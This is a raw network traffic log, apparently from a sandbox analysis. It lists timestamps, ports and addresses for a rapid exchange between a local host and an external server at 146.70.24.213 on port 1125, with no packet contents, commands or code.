Oct 11, 2024 16:53:48.420902014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420902967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420917034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420933008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420939922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.420970917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420984030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.420998096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421009064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421013117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421035051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421050072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421053886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421068907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421082973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421096087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421118975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421139956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421142101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421159983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421173096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421188116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421202898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421202898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421217918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421219110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421508074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421545029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421550989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421583891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421588898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421633005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421647072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421684027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421684980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421700954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421725988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421786070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421799898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421813965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421822071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421828032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421843052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421852112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421866894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421879053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421883106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421896935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421911001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.421931982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421957016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.421982050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422055006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422122955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422137022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422161102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422187090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422254086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422303915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422318935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422343969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422372103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422385931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422410965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422418118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422432899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422456026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422485113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422499895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422514915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422523022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422530890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422544956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422550917 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422708988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422723055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422736883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422749043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422775984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422775984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422791958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422806025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422816038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422846079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.422879934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422894001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.422933102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.423392057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423407078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423423052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423463106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.423511982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423526049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423541069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423551083 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.423554897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423569918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423576117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.423615932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.423947096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423959970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423974037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.423999071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424012899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424026966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424042940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424050093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424058914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424081087 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424192905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424207926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424221992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424233913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424237013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424261093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424331903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424345970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424360991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424376011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424386024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424405098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424483061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424496889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424510956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424524069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424535990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424540043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424550056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424556017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424576044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.424607992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424622059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.424644947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.476799011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511178017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511209011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511223078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511234999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511249065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511260986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511274099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511323929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511336088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511370897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511420965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511461020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511475086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511487007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511493921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511507034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511519909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511523008 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511553049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.511940956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511957884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511971951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511985064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.511997938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512001038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512012959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512021065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512028933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512041092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512053967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512058973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512075901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512089014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512100935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512103081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512111902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512115002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512129068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512146950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512152910 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512159109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512171984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512176037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512187004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512200117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512202024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512217045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512228966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512229919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512243032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512254953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512264013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512267113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512280941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512294054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512300968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512307882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512320995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512334108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512336969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512346983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512360096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512382030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512386084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512404919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512418985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512433052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512445927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512470961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512516022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512614012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512628078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512641907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512654066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512666941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512671947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512680054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512693882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512706995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512710094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512726068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512738943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512751102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512752056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512773037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512784958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512794018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512808084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.512809038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512824059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.512859106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513072968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513087988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513102055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513149023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513226032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513289928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513303041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513315916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513333082 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513344049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513350010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513367891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513381004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513394117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513406992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513410091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513421059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513423920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513436079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.513439894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.513478041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514420986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514442921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514462948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514475107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514487982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514488935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514503956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514513969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514549017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514580965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514602900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514636040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514642954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514647007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514661074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514674902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514687061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514694929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514699936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514712095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514739037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514904976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514928102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514950037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.514970064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.514972925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515011072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515033007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515052080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515067101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515079021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515091896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515129089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515136003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515162945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515178919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515192032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515207052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515218973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515218973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515243053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515255928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515264034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515266895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515290976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515309095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515314102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515338898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515357018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.515363932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515758991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.515811920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.601807117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601825953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601845026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601856947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601866961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601877928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601876974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.601896048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601907969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601916075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.601917028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601928949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601938009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601948977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601949930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.601958990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601972103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.601980925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.601984978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602016926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602119923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602161884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602171898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602206945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602224112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.602241039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602255106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.602266073 CEST	1125	49730	146.70.24.213	192.168.2.4
